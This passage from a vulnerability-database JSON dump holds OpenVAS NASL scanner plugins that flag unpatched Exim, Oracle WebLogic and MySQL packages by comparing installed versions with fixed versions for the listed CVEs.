discovered that the Exim daemon did not correctly handle format\n strings in DKIM headers. An unauthenticated remote attacker could send\n specially crafted email to run arbitrary code as the Exim user. The\n default compiler options for affected releases reduces the vulnerability\n to a denial of service under most conditions.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1130-1\";\ntag_affected = \"exim4 on Ubuntu 11.04 ,\n Ubuntu 10.10 ,\n Ubuntu 10.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1130-1/\");\n script_id(840659);\n script_version(\"$Revision: 7964 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:32:11 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"1130-1\");\n script_cve_id(\"CVE-2011-1764\");\n script_name(\"Ubuntu Update for exim4 USN-1130-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.71-3ubuntu1.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.71-3ubuntu1.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.71-3ubuntu1.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.74-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.74-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.74-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.72-1ubuntu1.2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.72-1ubuntu1.2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.72-1ubuntu1.2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:39:44", "description": "The remote host is missing an update to exim4\nannounced via advisory DSA 2232-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2232-1 (exim4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1764"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231069730", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231069730", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2232_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2232-1 (exim4)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.69730\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1764\");\n script_name(\"Debian Security Advisory DSA 2232-1 (exim4)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202232-1\");\n script_tag(name:\"insight\", value:\"It was discovered that Exim, the default mail transport agent in\nDebian, uses DKIM data obtain from DNS directly in a format string,\npotentially allowing malicious mail senders to execute arbitrary code.\n(CVE-2011-1764)\n\nThe oldstable distribution (lenny) is not affected by this problem\nbecause it does not contain DKIM support.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.72-6+squeeze1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.75-3.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your exim4 packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to exim4\nannounced via advisory DSA 2232-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.72-6+squeeze1\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:40:02", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1130-1", "cvss3": {}, "published": "2011-05-17T00:00:00", "type": "openvas", "title": "Ubuntu Update for exim4 USN-1130-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1764"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310840659", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840659", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1130_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for exim4 USN-1130-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1130-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840659\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-05-17 15:58:48 +0200 (Tue, 17 May 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"USN\", value:\"1130-1\");\n script_cve_id(\"CVE-2011-1764\");\n script_name(\"Ubuntu Update for exim4 USN-1130-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(10\\.04 LTS|11\\.04|10\\.10)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1130-1\");\n script_tag(name:\"affected\", value:\"exim4 on Ubuntu 11.04,\n Ubuntu 10.10,\n Ubuntu 10.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"It was discovered that the Exim daemon did not correctly handle format\n strings in DKIM headers. An unauthenticated remote attacker could send\n specially crafted email to run arbitrary code as the Exim user. The\n default compiler options for affected releases reduces the vulnerability\n to a denial of service under most conditions.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.71-3ubuntu1.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.71-3ubuntu1.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.71-3ubuntu1.2\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.74-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.74-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.74-1ubuntu1.1\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-custom\", ver:\"4.72-1ubuntu1.2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.72-1ubuntu1.2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.72-1ubuntu1.2\", rls:\"UBUNTU10.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:55:37", "description": "The remote host is missing an update to exim4\nannounced via advisory DSA 2232-1.", "cvss3": {}, "published": "2011-08-03T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2232-1 (exim4)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-1764"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:69730", "href": "http://plugins.openvas.org/nasl.php?oid=69730", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2232_1.nasl 6613 2017-07-07 12:08:40Z cfischer $\n# Description: Auto-generated from advisory DSA 2232-1 (exim4)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that Exim, the default mail transport agent in\nDebian, uses DKIM data obtain from DNS directly in a format string,\npotentially allowing malicious mail senders to execute arbitrary code.\n(CVE-2011-1764)\n\nThe oldstable distribution (lenny) is not affected by this problem\nbecause it does not contain DKIM support.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 4.72-6+squeeze1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 4.75-3.\n\nWe recommend that you upgrade your exim4 packages.\";\ntag_summary = \"The remote host is missing an update to exim4\nannounced via advisory DSA 2232-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202232-1\";\n\n\nif(description)\n{\n script_id(69730);\n script_version(\"$Revision: 6613 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:08:40 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-03 04:36:20 +0200 (Wed, 03 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1764\");\n script_name(\"Debian Security Advisory DSA 2232-1 (exim4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2011 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"exim4\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-base\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-config\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-heavy-dbg\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-daemon-light-dbg\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dbg\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"exim4-dev\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eximon4\", ver:\"4.72-6+squeeze1\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-29T22:19:37", "description": "Oracle WebLogic Server is prone to a remote code execution vulnerability.", "cvss3": {}, "published": "2015-11-17T00:00:00", "type": "openvas", "title": "Oracle WebLogic Server Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-4852"], "modified": "2020-04-27T00:00:00", "id": "OPENVAS:1361412562310806622", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806622", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Oracle WebLogic Server Remote Code Execution Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:bea:weblogic_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806622\");\n script_version(\"2020-04-27T04:21:52+0000\");\n script_cve_id(\"CVE-2015-4852\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-04-27 04:21:52 +0000 (Mon, 27 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-11-17 14:28:17 +0530 (Tue, 17 Nov 2015)\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_name(\"Oracle WebLogic Server Remote Code Execution Vulnerability\");\n\n script_tag(name:\"summary\", value:\"Oracle WebLogic Server is prone to a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to presence of a deserialization error.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary code\n on the affected system.\");\n\n script_tag(name:\"affected\", value:\"Oracle WebLogic Server versions 10.3.6.0, 12.1.2.0, 12.1.3.0 and 12.2.1.0.\");\n\n script_tag(name:\"solution\", value:\"Apply the update from the referenced advisory.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html\");\n script_xref(name:\"URL\", value:\"http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\");\n script_xref(name:\"URL\", value:\"http://www.oracle.com/technetwork/topics/security/alert-cve-2015-4852-2763333.html?evite=WWSU12091612MPP001\");\n\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_oracle_weblogic_consolidation.nasl\");\n script_mandatory_keys(\"oracle/weblogic/detected\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!version = get_app_version(cpe:CPE, nofork:TRUE))\n exit(0);\n\nif(version_is_equal(version:version, test_version:\"10.3.6.0.0\")||\n version_is_equal(version:version, test_version:\"12.1.2.0.0\")||\n version_is_equal(version:version, test_version:\"12.1.3.0.0\")||\n version_is_equal(version:version, test_version:\"12.2.1.0.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(data:report, port:0);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:41:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-12-13T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for mysql (openSUSE-SU-2012:0860-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-2122"], "modified": "2020-01-31T00:00:00", "id": "OPENVAS:1361412562310850182", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850182", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850182\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-12-13 17:01:55 +0530 (Thu, 13 Dec 2012)\");\n script_cve_id(\"CVE-2012-2122\");\n script_tag(name:\"cvss_base\", value:\"5.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:N/C:P/I:P/A:P\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0860-1\");\n script_name(\"openSUSE: Security Advisory for mysql (openSUSE-SU-2012:0860-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mysql'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.4|openSUSE12\\.1)\");\n\n script_tag(name:\"affected\", value:\"mysql on openSUSE 12.1, openSUSE 11.4\");\n\n script_tag(name:\"insight\", value:\"Fixing CVE-2012-2122: authentication bypass due to\n incorrect type casting\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient16\", rpm:\"libmysqlclusterclient16~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient16-debuginfo\", rpm:\"libmysqlclusterclient16-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient_r16\", rpm:\"libmysqlclusterclient_r16~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libmysqlclusterclient_r16-debuginfo\", rpm:\"libmysqlclusterclient_r16-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster\", rpm:\"mysql-cluster~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-bench\", rpm:\"mysql-cluster-bench~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-bench-debuginfo\", rpm:\"mysql-cluster-bench-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-client\", rpm:\"mysql-cluster-client~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-client-debuginfo\", rpm:\"mysql-cluster-client-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debug\", rpm:\"mysql-cluster-debug~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debug-debuginfo\", rpm:\"mysql-cluster-debug-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debuginfo\", rpm:\"mysql-cluster-debuginfo~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mysql-cluster-debugsource\", rpm:\"mysql-cluster-debugsource~7.1.22~55.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n 